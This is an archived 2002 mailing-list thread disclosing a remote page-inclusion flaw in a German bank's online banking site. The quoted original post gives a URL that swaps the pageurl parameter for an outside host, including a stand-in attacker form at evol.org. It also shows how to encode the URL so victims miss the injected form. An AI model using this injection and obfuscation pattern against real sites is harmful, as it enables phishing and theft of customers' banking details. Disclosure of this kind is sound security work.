Vulnerability Development mailing list archives
Re: security issue at hypovereins bank
From: "Carlos Heller" <carlos.heller () ip-value de>
Date: Sun, 7 Apr 2002 22:52:24 +0200
I discovered two security issues on german onlinebanking systems, and it was hard to find a responsible person. After a lot of expensive phonecalls we informed a german newspaper called express, get 500 buckets cash for the story and the hole was closed within one day...grin..... cu (C)arlos Heller Project Manager ip value GmbH Goethering 58 D-63067 Offenbach Phone: +49 69 800 88 114 Fax: +49 69 800 88 555 Mobile: +49 173 726 0137 premioss - the ip value product suite for network operators "hnz geeratz[room23]" <staff () room23 org> 05.04.2002 12:12 To: <vuln-dev () securityfocus com> cc: Subject: security issue at hypovereins bank hello I found this security issue on the german hypovereins bank. They are informed vor 3 months ago , still there is nothing changed. The security hole will allow a atacker to include his own forms in the website. This will give him an option to collect sensible information. It is a home bankin system! take a look at this (long) URL: http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu now it is possible to change the pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu part to something like pageurl=http://www.evol.org/fake_form.php ore try : http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de so it is possible to include everything in this webpage. The attacker could obscure the url in a form like: pageurl=h%74t%70%3A%2Fw%77w%77............ so the user will not notice that the include form is not from the original server It opens a port to a new form of social hacking and data grabbing. greetings hnz g -- hnz geeratz | staff () room23 org
Current thread:
- security issue at hypovereins bank hnz geeratz[room23] (Apr 05)
- Re: security issue at hypovereins bank Dominik Birk (Apr 05)
- <Possible follow-ups>
- Re: security issue at hypovereins bank Carlos Heller (Apr 07)